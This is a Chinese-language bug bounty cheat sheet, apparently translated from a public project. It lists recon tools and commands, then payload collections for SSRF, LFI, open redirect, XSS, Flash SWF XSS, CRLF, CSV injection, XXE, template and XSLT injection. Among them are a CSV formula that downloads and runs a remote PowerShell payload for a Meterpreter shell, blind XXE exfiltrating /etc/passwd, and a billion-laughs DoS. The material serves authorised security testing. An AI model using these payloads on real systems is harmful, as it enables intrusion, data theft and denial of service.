众测备忘手册 - 码农教程

众测备忘手册

From ChaMd5安全团队核心成员 MoonFish

前言

最近一直在看bugbountyforum对赏金猎人采访的文章以及一些分享姿势的PPT，所以结合bugbounty-cheatsheet项目对他们使用的工具，方法和思路进行整理。这里只是一个列表，并不是很详细，常见的姿势也不会被写上，还需要慢慢填充。

众测平台

HackerOne, Bugcrowd, BountyFactory，Intigriti，Bugbountyjp，Synack，Zerocopter，Cobalt，Yogosha

工具以及一些tips

在线域名信息收集：

https://dnsdumpster.com 
http://threatcrowd.org 
https://publicwww.com(可以搜索js、css中的域名，收费)
http://reverseip.domaintools.com(C段)
https://mxtoolbox.com
https://virustotal.com
https://crt.sh/?q=%25.uber.com
https://google.com/transparencyreport/https/ct/
https://pentest-tools.com/information-gathering/google-hacking
https://censys.io/certificates?q=

域名收集工具的小tips

利用sublist3r.py收集多个网站的子域名，下面的命令会从domains文件获取网站，然后输出子域名到对应的txt文件中

cat domains | xargs -n1 -i{} python sublist3r.py -d {} -o {}.txt

利用apktool和linkfinder获取APP中的域名信息（前提是APP未加密混淆）

apktool d app.apk; cd app;mkdir collection; find . -name *.smali -exec sh -c "cp {} collection/$(head /dev/urandom | md5sum | cut -d' ' -f1).smali" ;; python /root/linkfinder/linkfinder.py -i 'collection/*.smali' -o cli

以某APP为例

详细输出结果可以在output.html中找到

Aquatone域名收集神器简化命令

将aquatone-discover -d $1 && aquatone-scan -d $1 --ports huge && aquatone-takeover -d $1 && aquatone-gather -d $1
写入aqua.sh
./aqua.sh xx.com

获取页面中所有的链接

lynx -dump http://www.xxxxx.com/ | awk '/http/{print $2}'

还有几款经常被提到的工具Intrigue-core、massdns、EyeWitness。

漏洞payload和绕过姿势

SSRF:

http://0177.1/
http://0x7f.1/
https://520968996(利用网站 http://www.subnetmask.info/)
IPv6
http://[::1]
http://[::]

Wildcard DNS(例：乌云多数已修复SSRF漏洞可被绕过)

http://xip.io
http://nip.io

监控DNS解析和HTTP访问记录的网站(类似dnslog/ceye,姿势参考freebuf《HTTP盲攻击》)

http://dnsbin.zhack.ca (DNS)
http://pingb.in (DNS)
http://requestb.in (HTTP)
https://www.mockbin.org/ (HTTP)

LFI:

../
../
/..
/..
/%5c..
FFmpeg Local File Disclosure（搜狐优酷腾讯都出现过。）（https://github.com/neex/ffmpeg-avi-m3u-x bin/blob/master/gen_xbin_avi.py）

OPEN REDIRECT:

/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//google.com/
//google.com/%2f..
example.com%23@whitelisted.com(bypass)
其他的一些payload 
https://github.com/cujanovic/Open-Redirect-Payloads

XSS :

先知XSS挑战赛writeup：http://mp.weixin.qq.com/s/d_UCJusUdWCRTo3Vutsk_A

一个通用的xss payload：

jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e

绕过url处的校验

javas&#x09;cript://www.google.com/%0Aalert(1)

Markdown XSS

[a](javascript:confirm(1)
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a]: (javascript:prompt(1))

FLASH SWF XSS

ZeroClipboard: ZeroClipboard.swf?id="))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and other variants)
FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29
YUI "io.swf": io.swf?yid="));}catch(e){alert(document.domain);}//
YUI "uploader.swf": uploader.swf?allowedDomain=%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<
Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
AutoDemo: control.swf?onend=javascript:alert(1)//
Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?tracecall=alert(document.domain)
SWFUpload 2.2.0.1: swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);// (国内一些框架之前出过这个问题，如thinkphp)
Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf

Angular JS模板注入

CRLF:

%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
%0d%0aheader:header
%0aheader:header
%0dheader:header
%23%0dheader:header
%3f%0dheader:header
/%250aheader:header
/%25250aheader:header
/%%0a0aheader:header
/%3f%0dheader:header
/%23%0dheader:header
/%25%30aheader:header
/%25%30%61header:header
/%u000aheader:header
利用跳转进行CRLF
//www.google.com/%2f%2e%2e%0d%0aheader:header
/www.google.com/%2e%2e%2f%0d%0aheader:header
/google.com/%2F..%0d%0aheader:header
利用crlf进行xss
%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E
参考：https://www.leavesongs.com/PENETRATION/Sina-CRLF-Injection.html

CSV Injection:

%0A-3+3+cmd|' /C calc'!D2
Meterpreter Shell
=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0
参考：http://bobao.360.cn/learning/detail/2997.html

XXE Injection:

文件读取：

<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
外带数据(第一次请求不会返回数据)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
PHP案例
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>&ac;</result></foo>

检测SSRF

<?xml version="1.0"?>
<!DOCTYPE foo [  
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>

XEE(拒绝服务https://yq.aliyun.com/articles/8723)

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
XEE(远程攻击)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test<lol></lolz>

利用ftp协议传输数据（搜狗某站文件读取/列目录-Java环境Blind XXE）

详细：http://www.freebuf.com/articles/web/97833.html

https://github.com/RUB-NDS/DTD-Attacks

模板注入：

Ruby
<%=`id`%>
Twig 
{{7*'7'}} 输出49
Jinja
{{7*'7'}}输出7777777

XSLT 注入

获取信息

<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
    <body>
        <xsl:text>xsl:vendor = </xsl:text><xsl:value-of select="system-property('xsl:vendor')"/><br/>
        <xsl:text>xsl:version = </xsl:text><xsl:value-of select="system-property('xsl:version')"/><br/>
    </body>
</html>

PHP利用

<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
    <body>
        <xsl:value-of name="bugbounty" select="php:function('phpinfo')"/>
    </body>
</html>

尾声

本文根据开源项目bugbounty-cheatsheet(https://github.com/EdOverflow/bugbounty-cheatsheet/)翻译总结而成，由于译者时间比较紧张，未做详细验证，所以文章中有什么错误或者表哥想贡献思路，可以加我的微信bbqcms反馈。